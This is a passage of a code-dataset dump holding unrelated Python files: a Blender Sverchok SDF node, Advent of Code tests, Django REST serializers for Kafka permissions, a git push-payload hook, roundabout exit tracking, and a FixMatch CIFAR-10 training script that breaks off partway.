cmd)))\n\n\n","repo_name":"nextdorf/bot-collection","sub_path":"discord/BuggyPasta/cowsay_cmd.py","file_name":"cowsay_cmd.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13078439554","text":"import numpy as np\n\nimport bpy\nfrom bpy.props import FloatProperty, EnumProperty, BoolProperty, IntProperty, FloatVectorProperty\n\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.data_structure import updateNode, zip_long_repeat, ensure_nesting_level, get_data_nesting_level\nfrom sverchok.utils.field.scalar import SvScalarField\nfrom sverchok_extra.dependencies import sdf\nfrom sverchok_extra.utils.sdf import *\n\nclass SvExSdfSliceNode(SverchCustomTreeNode, bpy.types.Node):\n \"\"\"\n Triggers: SDF Slice\n Tooltip: SDF Slice\n \"\"\"\n bl_idname = 'SvExSdfSliceNode'\n bl_label = 'SDF Slice'\n bl_icon = 'OUTLINER_OB_EMPTY'\n sv_icon = 'SV_SLICE_SOLID'\n sv_dependencies = {'sdf'}\n\n z_value : FloatProperty(\n name = \"Z Value\",\n default = 0.0,\n update = updateNode)\n\n def sv_init(self, context):\n self.inputs.new('SvScalarFieldSocket', \"SDF\")\n self.inputs.new('SvStringsSocket', \"ZValue\").prop_name = 'z_value'\n self.outputs.new('SvScalarFieldSocket', \"SDF\")\n\n def process(self):\n if not any(socket.is_linked for socket in self.outputs):\n return\n\n sdf_s = self.inputs['SDF'].sv_get()\n z_value_s = self.inputs['ZValue'].sv_get()\n\n input_level = get_data_nesting_level(sdf_s, data_types=(SvScalarField,))\n flat_output = input_level == 1\n sdf_s = ensure_nesting_level(sdf_s, 2, data_types=(SvScalarField,))\n z_value_s = ensure_nesting_level(z_value_s, 2)\n\n sdf_out = []\n for params in zip_long_repeat(sdf_s, z_value_s):\n new_sdf = []\n for sdf, z_value in zip_long_repeat(*params):\n sdf = scalar_field_to_sdf(sdf, 0)\n sdf_2d = sdf.translate((0, 0, -z_value)).slice()\n field = SvExSdf2DScalarField(sdf_2d)\n new_sdf.append(field)\n if flat_output:\n sdf_out.extend(new_sdf)\n else:\n sdf_out.append(new_sdf)\n\n self.outputs['SDF'].sv_set(sdf_out)\n\n\ndef register():\n bpy.utils.register_class(SvExSdfSliceNode)\n\n\ndef unregister():\n bpy.utils.unregister_class(SvExSdfSliceNode)\n","repo_name":"portnov/sverchok-extra","sub_path":"nodes/sdf/sdf_slice.py","file_name":"sdf_slice.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"50"} +{"seq_id":"4941407522","text":"import unittest\n\nfrom common import read_lines\nfrom day13.transparent_origami import visible_dots_after_first_fold, fold_all\n\n\nclass TransparentOrigamiTest(unittest.TestCase):\n test_input = [\n \"6,10\",\n \"0,14\",\n \"9,10\",\n \"0,3\",\n \"10,4\",\n \"4,11\",\n \"6,0\",\n \"6,12\",\n \"4,1\",\n \"0,13\",\n \"10,12\",\n \"3,4\",\n \"3,0\",\n \"8,4\",\n \"1,10\",\n \"2,14\",\n \"8,10\",\n \"9,0\",\n \"\",\n \"fold along y=7\",\n \"fold along x=5\"]\n input = read_lines(\"day13\")\n\n def test_part_1_example(self):\n self.assertEqual(visible_dots_after_first_fold(self.test_input), 17)\n\n def test_part_1_solution(self):\n self.assertEqual(visible_dots_after_first_fold(self.input), 847)\n\n def test_part_2_example(self):\n print(\"Day 13 Part 2 Test:\")\n print(fold_all(self.test_input))\n\n def test_part_2_solution(self):\n print(\"Day 13 Part 2 Solution:\")\n print(fold_all(self.input))\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"mgellert/advent-of-code-2021-python","sub_path":"day13/transparent_origami_test.py","file_name":"transparent_origami_test.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10820133440","text":"from django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import serializers\nfrom ..models import *\n\nimport traceback\n\nclass ReadableEnumField(serializers.Field):\n    def __init__(self, enum_cls, *args, **kwargs):\n        self.enum = enum_cls\n        return super(ReadableEnumField, self).__init__(*args, **kwargs)\n\n    def to_representation(self, value):\n        return value.name\n\n    def to_internal_value(self, value):\n        # handle string values for enum member names\n        if value in self.enum.__members__:\n            return self.enum.__members__[value]\n        # handle raw values (usually ints)\n        if value in self.enum:\n            return self.enum(value)\n        raise serializers.ValidationError(f\"Invalid membership status value {value}\")\n\nclass UserSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = User\n        fields = [\"pk\", \"username\", \"email\"]\n        read_only_fields = [\"pk\", \"username\", \"email\"]\n\nclass SCRAMCredentialsSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = SCRAMCredentials\n        fields = [\"pk\", \"owner\", \"username\", \"created_at\", \"suspended\", \"description\"]\n        read_only_fields = [\"pk\", \"owner\", \"username\", \"created_at\"]\n\nclass GroupSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Group\n        fields = [\"pk\", \"name\", \"description\"]\n        read_only_fields = [\"pk\", \"name\"]\n\nclass GroupMembershipSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = GroupMembership\n        fields = [\"pk\", \"user\", \"group\", \"status\"]\n        read_only_fields = [\"pk\", \"user\", \"group\"]\n    status = ReadableEnumField(MembershipStatus)\n\nclass GroupMembershipCreationSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = GroupMembership\n        fields = [\"user\", \"group\", \"status\"]\n    status = ReadableEnumField(MembershipStatus)\n\nclass KafkaTopicSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = KafkaTopic\n        fields = [\"pk\", \"owning_group\", \"name\", \"publicly_readable\", \"description\", \"archivable\",\n                  \"max_message_bytes\", \"retention_ms\", \"retention_bytes\"]\n        read_only_fields = [\"pk\", \"owning_group\", \"name\",\n                            \"max_message_bytes\", \"retention_ms\", \"retention_bytes\"]\n\n    def validate_publicly_readable(self, value):\n        if value is not True:\n            raise serializers.ValidationError(\"Public topics may not be made private\")\n        # DRF field-level validators must return the validated value,\n        # otherwise the field would silently be set to None\n        return value\n\nclass KafkaTopicAdminSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = KafkaTopic\n        fields = [\"pk\", \"owning_group\", \"name\", \"publicly_readable\", \"description\", \"archivable\",\n                  \"n_partitions\", \"max_message_bytes\", \"retention_ms\", \"retention_bytes\"]\n        read_only_fields = [\"pk\", \"owning_group\", \"name\"]\n\nclass KafkaTopicCreationSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = KafkaTopic\n        fields = [\"owning_group\", \"name\", \"publicly_readable\", \"description\"]\n\n    def validate(self, data):\n        data = super().validate(data)\n        \n        name = data[\"name\"]\n        group = data[\"owning_group\"]\n        \n        if not validate_topic_name(name):\n            raise serializers.ValidationError(\"Invalid topic name\")\n\n        name = group.name + '.' 
+ name\n \n if KafkaTopic.objects.filter(name=name).exists():\n raise serializers.ValidationError(\"Topic name already in use\")\n \n data[\"name\"] = name\n \n return data\n\nclass GroupKafkaPermissionSerializer(serializers.ModelSerializer):\n class Meta:\n model = GroupKafkaPermission\n fields = [\"pk\", \"principal\", \"topic\", \"operation\"]\n read_only_fields = [\"pk\", \"principal\", \"topic\", \"operation\"]\n operation = ReadableEnumField(KafkaOperation)\n\nclass GroupKafkaPermissionCreateSerializer(serializers.ModelSerializer):\n class Meta:\n model = GroupKafkaPermission\n fields = [\"principal\", \"topic\", \"operation\"]\n operation = ReadableEnumField(KafkaOperation)\n\t\t\nclass CredentialKafkaPermissionSerializer(serializers.ModelSerializer):\n class Meta:\n model = CredentialKafkaPermission\n fields = [\"pk\", \"principal\", \"topic\", \"operation\"]\n read_only_fields = [\"pk\", \"principal\", \"topic\", \"operation\"]\n operation = ReadableEnumField(KafkaOperation)\n \nclass CredentialKafkaPermissionCreationSerializer(serializers.ModelSerializer):\n class Meta:\n model = CredentialKafkaPermission\n fields = [\"principal\", \"topic\", \"operation\"]\n operation = ReadableEnumField(KafkaOperation)\n","repo_name":"scimma/scimma-admin","sub_path":"scimma_admin/hopskotch_auth/serializers/v0.py","file_name":"v0.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70628351517","text":"#!/usr/bin/python\n\nimport json\nimport sys\nfrom pygit2 import Repository, Oid, GIT_SORT_TOPOLOGICAL\n\nnil=\"0000000000000000000000000000000000000000\"\n\npayload = dict(zip(('before', 'after', 'ref'), sys.stdin.read().split()))\n\npayload['created'] = True if payload['before'] == nil else False\npayload['deleted'] = True if payload['after'] == nil else False\n\nif not payload['created'] and not payload['deleted']:\n\n repo = Repository('.')\n\n log = repo.walk(Oid(hex=payload['after']), GIT_SORT_TOPOLOGICAL)\n log.hide(Oid(hex=payload['before']))\n payload['commits'] = []\n for commit in log:\n info = {}\n info['id'] = commit.hex\n info['message'] = commit.message\n\n author = {}\n author['name'] = commit.author.name\n author['email'] = commit.author.email\n author['timestamp'] = commit.author.time\n info['author'] = author\n\n committer = {}\n committer['name'] = commit.committer.name\n committer['email'] = commit.committer.email\n committer['timestamp'] = commit.committer.time\n info['committer'] = committer\n\n payload['commits'].append(info)\n\nprint(json.dumps(payload))\n","repo_name":"sinisterstuf/web-hooker","sub_path":"web-hooker.py","file_name":"web-hooker.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31211269559","text":"from tools import consts\n\nclass ExitTracking:\n def __init__(self, topology, flow_stats):\n self.vehicles = {}\n self.training_data = {}\n self.flow_stats = flow_stats\n\n self.topology = topology\n\n def update_vehicle(self, obj, timestep):\n vehicle_id = obj[consts.TRACK_ID]\n if vehicle_id not in self.vehicles:\n self.vehicles[vehicle_id] = {'tracks': [], 'exit_point': None}\n\n if vehicle_id in self.training_data: # Vehicle already exited, skip\n return\n\n # Is vehicle exiting?\n is_exiting = self.topology.getobjectexits(obj)\n if is_exiting != -1:\n #print (\"vid {} exiting on exit {}\".format(vehicle_id, is_exiting))\n 
self.vehicles[vehicle_id]['exit_point'] = is_exiting\n self.generate_training_data(vehicle_id)\n\n else:\n # Add track data\n # 1. current lane id\n current_lane = self.topology.get_lane_distance(obj)\n if current_lane is None: # Not in the roundabout yet, skip\n return\n\n # 2. relative heading\n signed_relheading = self.topology.get_relative_heading(obj)\n\n # 3. straight-line distance to next exit.\n (next_exit_id, distance,\n distance_rel) = self.topology.get_distance_to_next_exit(obj)\n\n self.vehicles[vehicle_id]['tracks'].append(\n (timestep, current_lane, signed_relheading, distance, distance_rel, next_exit_id))\n\n def generate_training_data(self, vehicle_id):\n if vehicle_id not in self.vehicles or self.vehicles[vehicle_id]['exit_point'] is None:\n return\n\n if vehicle_id in self.training_data:\n print(\"Warning: object id {} has already been added to ExitTracking training data.\".format(\n vehicle_id))\n return\n\n self.training_data[vehicle_id] = []\n for track in self.vehicles[vehicle_id]['tracks']:\n\n timestep = track[0]\n flow_df = self.flow_stats[(self.flow_stats['TimeBegin'] <= timestep) & (\n self.flow_stats['TimeEnd'] > timestep)]\n if flow_df.shape[0] > 0:\n mean_approach_speed = flow_df.iloc[0]['MeanApproachSpeed']\n mean_density = flow_df.iloc[0]['MeanDensity']\n flow = flow_df.iloc[0]['Flow']\n capacity_german = flow_df.iloc[0]['Capacity_German']\n capacity_hcm2016 = flow_df.iloc[0]['Capacity_HCM2016']\n flow_capacity_german = flow_df.iloc[0]['FlowOverCapacity_German']\n flow_capacity_hcm2016 = flow_df.iloc[0]['FlowOverCapacity_HCM2016']\n\n self.training_data[vehicle_id].append(\n (track[1],\n track[2],\n track[3],\n track[4],\n mean_approach_speed,\n mean_density,\n flow,\n capacity_german,\n capacity_hcm2016,\n flow_capacity_german,\n flow_capacity_hcm2016,\n (track[5] == self.vehicles[vehicle_id]['exit_point'])))\n","repo_name":"dvxd/roundabout-risk-knowledge-analysis","sub_path":"src/tools/exit_tracking.py","file_name":"exit_tracking.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"4874571783","text":"import sys, os, copy, random, argparse, math\nimport numpy as np\nimport pandas as pd \n\nimport PIL\nimport PIL.ImageOps\nimport PIL.ImageEnhance\nimport PIL.ImageDraw\nfrom PIL import Image\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.optim.lr_scheduler import LambdaLR\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom colorama import Fore\nfrom tqdm import tqdm\n\n\nfrom mixmatch import BasicBlock, NetworkBlock, WideResNet, accuracy, get_tqdm_config\n\n\nPARAMETER_MAX = 10\n\nmean_cifar10 = (0.4914, 0.4822, 0.4465)\nstd_cifar10 = (0.2471, 0.2345, 0.2616)\n\ndef _float_parameter(v, max_v):\n return float(v) * max_v / PARAMETER_MAX\n\n\ndef _int_parameter(v, max_v):\n return int(v * max_v / PARAMETER_MAX)\n\n# Augmentation 함수들을 정의\n\ndef AutoContrast(img, **kwargs):\n return PIL.ImageOps.autocontrast(img)\n\n\ndef Brightness(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n return PIL.ImageEnhance.Brightness(img).enhance(v)\n\n\ndef Color(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n return PIL.ImageEnhance.Color(img).enhance(v)\n\n\ndef Contrast(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n return 
PIL.ImageEnhance.Contrast(img).enhance(v)\n\n\ndef CutoutAbs(img, v, **kwargs):\n w, h = img.size\n x0, y0 = np.random.uniform(0, w), np.random.uniform(0, h)\n x0, y0 = int(max(0, x0 - v / 2.)), int(max(0, y0 - v / 2.))\n\n x1, y1 = int(min(w, x0 + v)), int(min(h, y0 + v))\n\n xy = (x0, y0, x1, y1)\n # gray\n color = (127, 127, 127)\n img = img.copy()\n \n PIL.ImageDraw.Draw(img).rectangle(xy, color)\n return img\n\n\ndef Cutout(img, v, max_v, bias=0):\n if v == 0:\n return img\n v = _float_parameter(v, max_v) + bias\n v = int(v * min(img.size))\n return CutoutAbs(img, v)\n\n\ndef Equalize(img, **kwargs):\n return PIL.ImageOps.equalize(img)\n\n\ndef Identity(img, **kwargs):\n return img\n\n\ndef Invert(img, **kwargs):\n return PIL.ImageOps.invert(img)\n\n\ndef Posterize(img, v, max_v, bias=0):\n v = _int_parameter(v, max_v) + bias\n return PIL.ImageOps.posterize(img, v)\n\n\ndef Rotate(img, v, max_v, bias=0):\n v = _int_parameter(v, max_v) + bias\n if random.random() < 0.5:\n v = -v\n return img.rotate(v)\n\n\ndef Sharpness(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n return PIL.ImageEnhance.Sharpness(img).enhance(v)\n\n\ndef ShearX(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n if random.random() < 0.5:\n v = -v\n return img.transform(img.size, PIL.Image.AFFINE, (1, v, 0, 0, 1, 0))\n\n\ndef ShearY(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n if random.random() < 0.5:\n v = -v\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, 0, v, 1, 0))\n\n\ndef Solarize(img, v, max_v, bias=0):\n v = _int_parameter(v, max_v) + bias\n return PIL.ImageOps.solarize(img, 256 - v)\n\n\ndef SolarizeAdd(img, v, max_v, bias=0, threshold=128):\n v = _int_parameter(v, max_v) + bias\n if random.random() < 0.5:\n v = -v\n img_np = np.array(img).astype(np.int)\n img_np = img_np + v\n img_np = np.clip(img_np, 0, 255)\n img_np = img_np.astype(np.uint8)\n img = Image.fromarray(img_np)\n return PIL.ImageOps.solarize(img, threshold)\n\n\ndef TranslateX(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n if random.random() < 0.5:\n v = -v\n v = int(v * img.size[0])\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, v, 0, 1, 0))\n\n\ndef TranslateY(img, v, max_v, bias=0):\n v = _float_parameter(v, max_v) + bias\n if random.random() < 0.5:\n v = -v\n v = int(v * img.size[1])\n return img.transform(img.size, PIL.Image.AFFINE, (1, 0, 0, 0, 1, v))\n\n# Augmentation list for RandAugment\ndef fixmatch_augment_pool():\n \n augs = [(AutoContrast, None, None),\n (Brightness, 0.9, 0.05),\n (Color, 0.9, 0.05),\n (Contrast, 0.9, 0.05),\n (Equalize, None, None),\n (Identity, None, None),\n (Posterize, 4, 4),\n (Rotate, 30, 0),\n (Sharpness, 0.9, 0.05),\n (ShearX, 0.3, 0),\n (ShearY, 0.3, 0),\n (Solarize, 256, 0),\n (TranslateX, 0.3, 0),\n (TranslateY, 0.3, 0)]\n return augs\n\n# 위에서 구현된 Augmentpool에서 랜덤으로 선정하여 실제 Augmentation을 구현\n\nclass RandAugmentMC(object):\n \n def __init__(self, n, m):\n\n assert n >= 1\n assert 1 <= m <= 10\n \n self.n = n\n self.m = m\n self.augment_pool = fixmatch_augment_pool()\n \n def __call__(self, img):\n \n ops = random.choices(self.augment_pool, k=self.n)\n \n for op, max_v, bias in ops:\n v = np.random.randint(1, self.m)\n if random.random() < 0.5:\n img = op(img, v=v, max_v=max_v, bias=bias)\n\n img = CutoutAbs(img, int(32*0.5))\n \n return img\n\n# Generate train data\nclass CIFAR10_SSL(datasets.CIFAR10):\n \n def __init__(self, root, indexs, train=True,\n transform=None, target_transform=None,\n 
download=False):\n \n \n super(CIFAR10_SSL, self).__init__(\n root, train=train, transform=transform,\n target_transform=target_transform, download=download\n )\n\n if indexs is not None:\n self.data = self.data[indexs]\n self.targets = np.array(self.targets)[indexs]\n \n def __getitem__(self, index):\n \n img, target = self.data[index], self.targets[index]\n img = Image.fromarray(img)\n\n if self.transform is not None:\n img = self.transform(img)\n \n if self.target_transform is not None:\n target = self.target_transform(target)\n \n return img, target\n \n# Weak augmentation & Strong augmentation\n\nclass TransformFixMatch(object):\n \n def __init__(self, mean=mean_cifar10, std=std_cifar10):\n \n self.weak_transform = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(size=32,\n padding=int(32*0.125),\n padding_mode='reflect')\n ])\n\n self.strong_transform = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(size=32,\n padding=int(32*0.125),\n padding_mode='reflect'),\n RandAugmentMC(n=2, m=10)\n ])\n\n self.normalize = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=mean, std=std)\n ]) \n \n \n def __call__(self, x):\n \n weak = self.weak_transform(x)\n strong = self.strong_transform(x)\n\n return self.normalize(weak), self.normalize(strong)\n \n# Labeled data와 Unlabeled data를 분리\n\ndef split_labeled_unlabeled(args, labels):\n \n label_per_class = args.n_labeled // args.n_classes\n labels = np.array(labels, dtype=int)\n indice_labeled, indice_unlabeled, indice_val = [], [], []\n\n for i in range(10):\n indice_tmp = np.where(labels==i)[0]\n\n indice_labeled.extend(indice_tmp[: label_per_class])\n indice_unlabeled.extend(indice_tmp[label_per_class: -500])\n indice_val.extend(indice_tmp[-500: ])\n \n for i in [indice_labeled, indice_unlabeled, indice_val]:\n np.random.shuffle(i)\n \n return np.array(indice_labeled), np.array(indice_unlabeled), np.array(indice_val)\n \ndef get_cifar10(args, data_dir):\n transform_labeled = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(size=32, padding=int(32*0.125), padding_mode='reflect'),\n transforms.ToTensor(),\n transforms.Normalize(mean=mean_cifar10, std=std_cifar10)\n ])\n\n transform_val = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=mean_cifar10, std=std_cifar10)\n ])\n\n base_dataset = datasets.CIFAR10(data_dir, train=True, download=True)\n\n indice_labeled, indice_unlabeled, indice_val = split_labeled_unlabeled(args, base_dataset.targets)\n \n labeled_dataset = CIFAR10_SSL(\n data_dir, indice_labeled, train=True,\n transform=transform_labeled\n )\n\n unlabeled_dataset = CIFAR10_SSL(\n data_dir, indice_unlabeled, train=True,\n transform=TransformFixMatch(mean=mean_cifar10, std=std_cifar10)\n )\n\n val_dataset = CIFAR10_SSL(\n data_dir, indice_val, train=True, transform=transform_val, download=False\n )\n\n test_dataset = datasets.CIFAR10(\n data_dir, train=False, transform=transform_val, download=False\n )\n \n return labeled_dataset, unlabeled_dataset, val_dataset, test_dataset\n\n# Parameter update with weightEMA\nclass WeightEMA(object): \n\n def __init__(self, model, decay):\n \n self.ema = copy.deepcopy(model)\n self.ema.eval()\n\n self.decay = decay\n\n self.ema_has_module = hasattr(self.ema, 'module')\n\n self.param_keys = [k for k, _ in self.ema.named_parameters()]\n self.buffer_keys = [k for k, _ in self.ema.named_buffers()]\n for p in self.ema.parameters():\n p.requires_grad_(False)\n\n 
def step(self, model):\n needs_module = hasattr(model, 'module') and not self.ema_has_module\n with torch.no_grad():\n msd = model.state_dict()\n esd = self.ema.state_dict()\n for k in self.param_keys:\n if needs_module:\n j = 'module.' + k\n else:\n j = k\n model_v = msd[j].detach()\n ema_v = esd[k]\n esd[k].copy_(ema_v * self.decay + (1. - self.decay) * model_v)\n\n for k in self.buffer_keys:\n if needs_module:\n j = 'module.' + k\n else:\n j = k\n esd[k].copy_(msd[j])\n \n# Learning rate scheduler\ndef get_cosine_schedule_with_warmup(\n optimizer, num_warmup_steps, num_training_steps,\n num_cycles=7.0/16.0, last_epoch=-1\n ):\n \n def _lr_lambda(current_step):\n if current_step < num_warmup_steps:\n return float(current_step)/float(max(1, num_warmup_steps))\n \n no_progress = float(current_step-num_warmup_steps)/\\\n (float(max(1, num_training_steps-num_warmup_steps)))\n return max(0.0, math.cos(math.pi*num_cycles*no_progress))\n \n return LambdaLR(optimizer, _lr_lambda, last_epoch)\n\n# define trainer\nclass FixMatchTrainer():\n \n def __init__(self, args):\n\n self.args = args\n \n root_dir = '/content/FixMatch' ### Project Directory\n data_dir = os.path.join(root_dir, 'data') ### Data Directory\n \n self.experiment_dir = os.path.join(root_dir, 'results') ### parent folder for saving trained models\n os.makedirs(self.experiment_dir, exist_ok=True)\n\n name_exp = \"_\".join([str(self.args.n_labeled), str(self.args.T)]) ### sub-folder for this run, named after its hyperparameters\n self.experiment_dir = os.path.join(self.experiment_dir, name_exp)\n os.makedirs(self.experiment_dir, exist_ok=True)\n \n print(\"==> Preparing CIFAR10 dataset\")\n labeled_set, unlabeled_set, val_set, test_set = get_cifar10(self.args, data_dir=data_dir)\n \n self.labeled_loader = DataLoader(\n labeled_set,\n sampler=RandomSampler(labeled_set), ### RandomSampler: plays the same role as DataLoader(shuffle=True)\n batch_size=self.args.batch_size,\n num_workers=0,\n drop_last=True\n )\n\n self.unlabeled_loader = DataLoader(\n unlabeled_set,\n sampler=RandomSampler(unlabeled_set),\n batch_size=self.args.batch_size,\n num_workers=0,\n drop_last=True\n )\n\n self.val_loader = DataLoader(\n val_set,\n sampler=SequentialSampler(val_set), ### SequentialSampler: plays the same role as DataLoader(shuffle=False)\n batch_size=self.args.batch_size,\n num_workers=0,\n drop_last=True\n )\n\n self.test_loader = DataLoader(\n test_set,\n sampler=SequentialSampler(test_set),\n batch_size=self.args.batch_size,\n num_workers=0\n )\n\n print(\"==> Preparing WideResNet\")\n self.model = WideResNet(self.args.n_classes).to(self.args.cuda)\n \n self.model.zero_grad()\n self.criterion = torch.nn.CrossEntropyLoss().to(self.args.cuda)\n\n no_decay = ['bias', 'bn']\n grouped_parameters = [\n {'params': [p for n, p in self.model.named_parameters() if not any(\n nd in n for nd in no_decay)], 'weight_decay': self.args.weight_decay},\n {'params': [p for n, p in self.model.named_parameters() if any(\n nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ] \n self.optimizer = torch.optim.SGD(grouped_parameters, lr=self.args.lr,\n momentum=0.9, nesterov=self.args.nesterov)\n \n self.scheduler = get_cosine_schedule_with_warmup(self.optimizer,\n self.args.warmup,\n self.args.total_steps)\n \n if self.args.use_ema: \n self.ema_model = WeightEMA(self.model, self.args.ema_decay)\n\n self.writer = SummaryWriter(self.experiment_dir)\n\n \n 
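# Side note (added): with the defaults used in this script (warmup=0, total_steps=2**14,\n # num_cycles=7/16), the cosine schedule built in __init__ above gives\n #   lr(t) = lr0 * cos((7*pi/16) * t / total_steps),\n # so the learning rate decays from 0.03 to about 0.03*cos(7*pi/16) ~= 0.0059 at the final\n # step and never reaches zero -- the shape used in the FixMatch paper.\n\n 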
def train(self, epoch):\n\n losses_t, losses_x, losses_u, mask_probs = 0.0, 0.0, 0.0, 0.0\n \n self.model.train()\n \n iter_labeled = iter(self.labeled_loader)\n iter_unlabeled = iter(self.unlabeled_loader)\n\n with tqdm(**get_tqdm_config(total=self.args.eval_step,\n leave=True, color='blue')) as pbar:\n \n for batch_idx in range(self.args.eval_step): ### eval_step: 1024 // batch_size: 64\n \n try:\n inputs_x, targets_x = next(iter_labeled)\n except StopIteration:\n iter_labeled = iter(self.labeled_loader)\n inputs_x, targets_x = next(iter_labeled)\n real_B = inputs_x.size(0)\n \n try:\n (inputs_u_w, inputs_u_s), _ = next(iter_unlabeled)\n except StopIteration:\n iter_unlabeled = iter(self.unlabeled_loader)\n (inputs_u_w, inputs_u_s), _ = next(iter_unlabeled)\n \n inputs = torch.cat((inputs_x, inputs_u_w, inputs_u_s), dim=0).to(self.args.cuda)\n targets_x = targets_x.type(torch.LongTensor)\n targets_x = targets_x.to(self.args.cuda)\n \n logits = self.model(inputs)\n \n logits_x = logits[:real_B]\n logits_u_w, logits_u_s = logits[real_B:].chunk(2)\n del(logits)\n\n loss_x = F.cross_entropy(logits_x, targets_x, reduction='mean')\n pseudo_labels = torch.softmax(logits_u_w.detach()/self.args.T, dim=-1) \n max_prob, targets_u = torch.max(pseudo_labels, dim=-1)\n mask = max_prob.ge(self.args.threshold).float() ##### mask: 1.0 where max_prob is at or above the threshold, 0.0 otherwise\n loss_u = (F.cross_entropy(logits_u_s, targets_u, reduction='none')*mask).mean()\n\n loss = loss_x + self.args.lambda_u * loss_u\n loss.backward()\n self.optimizer.step()\n self.scheduler.step()\n if self.args.use_ema:\n self.ema_model.step(self.model)\n \n self.model.zero_grad()\n \n ### accumulate loss values for TensorBoard logging\n losses_x += loss_x.item()\n losses_u += loss_u.item()\n losses_t += loss.item()\n mask_probs += max_prob.mean().item()\n \n ### Print log\n self.writer.add_scalars(\n 'Training steps', {\n 'Total_loss': losses_t/(batch_idx+1),\n 'Labeled_loss':losses_x/(batch_idx+1),\n 'Unlabeled_loss':losses_u/(batch_idx+1),\n 'Mask probs': mask_probs/(batch_idx+1)\n }, global_step=epoch*self.args.batch_size+batch_idx\n )\n\n pbar.set_description(\n '[Train(%4d/ %4d)-Total: %.3f|Labeled: %.3f|Unlabeled: %.3f]'%(\n (batch_idx+1), self.args.eval_step,\n losses_t/(batch_idx+1), losses_x/(batch_idx+1), losses_u/(batch_idx+1)\n )\n )\n pbar.update(1)\n\n pbar.set_description(\n '[Train(%4d/ %4d)-Total: %.3f|Labeled: %.3f|Unlabeled: %.3f]'%(\n epoch, self.args.epochs,\n losses_t/(batch_idx+1), losses_x/(batch_idx+1), losses_u/(batch_idx+1)\n )\n )\n return losses_t/(batch_idx+1), losses_x/(batch_idx+1), losses_u/(batch_idx+1)\n\n \n 
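# Side note (added): per batch, train() above minimizes\n #   l_x  = CE(f(x), y)                                   (labeled term)\n #   q    = softmax(f(weak(u)) / T)                       (pseudo-label distribution)\n #   l_u  = mean( 1[max q >= threshold] * CE(f(strong(u)), argmax q) )\n #   loss = l_x + lambda_u * l_u\n # With threshold=0.95 only confident pseudo-labels contribute, which is why the running\n # 'Mask probs' average is logged: it tracks how much of each unlabeled batch is used.\n\n 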
@torch.no_grad()\n def validate(self, epoch, phase):\n if phase == 'Train': ### Train Loss\n data_loader = self.labeled_loader\n c = 'blue'\n elif phase == 'Valid': ### Valid Loss\n data_loader = self.val_loader\n c = 'green'\n elif phase == 'Test ': ### Test Loss\n data_loader = self.test_loader\n c = 'red'\n \n losses = 0.0\n top1s, top5s = [], []\n \n with tqdm(**get_tqdm_config(total=len(data_loader),\n leave=True, color=c)) as pbar:\n for batch_idx, (inputs, targets) in enumerate(data_loader):\n inputs, targets = inputs.to(self.args.cuda), targets.to(self.args.cuda)\n targets = targets.type(torch.LongTensor).to(self.args.cuda)\n \n outputs = self.ema_model.ema(inputs)\n loss = self.criterion(outputs, targets)\n\n prec1, prec5 = accuracy(outputs, targets, topk=(1, 5))\n losses += loss.item()\n top1s.append(prec1)\n top5s.append(prec5)\n\n self.writer.add_scalars(\n f'{phase} steps', {\n 'Total_loss': losses/(batch_idx+1),\n 'Top1 Acc': np.mean(top1s),\n 'Top5 Acc': np.mean(top5s)\n }, global_step=epoch*self.args.batch_size+batch_idx\n )\n\n pbar.set_description(\n '[%s-Loss: %.3f|Top1 Acc: %.3f|Top5 Acc: %.3f]'%(\n phase,\n losses/(batch_idx+1), np.mean(top1s), np.mean(top5s)\n )\n )\n pbar.update(1)\n\n pbar.set_description(\n '[%s(%4d/ %4d)-Loss: %.3f|Top1 Acc: %.3f|Top5 Acc: %.3f]'%(\n phase,\n epoch, self.args.epochs,\n losses/(batch_idx+1), np.mean(top1s), np.mean(top5s)\n )\n )\n\n return losses/(batch_idx+1), np.mean(top1s), np.mean(top5s) \n \n# Argument \ndef FixMatch_parser():\n parser = argparse.ArgumentParser()\n \n # method arguments\n parser.add_argument('--n-labeled', type=int, 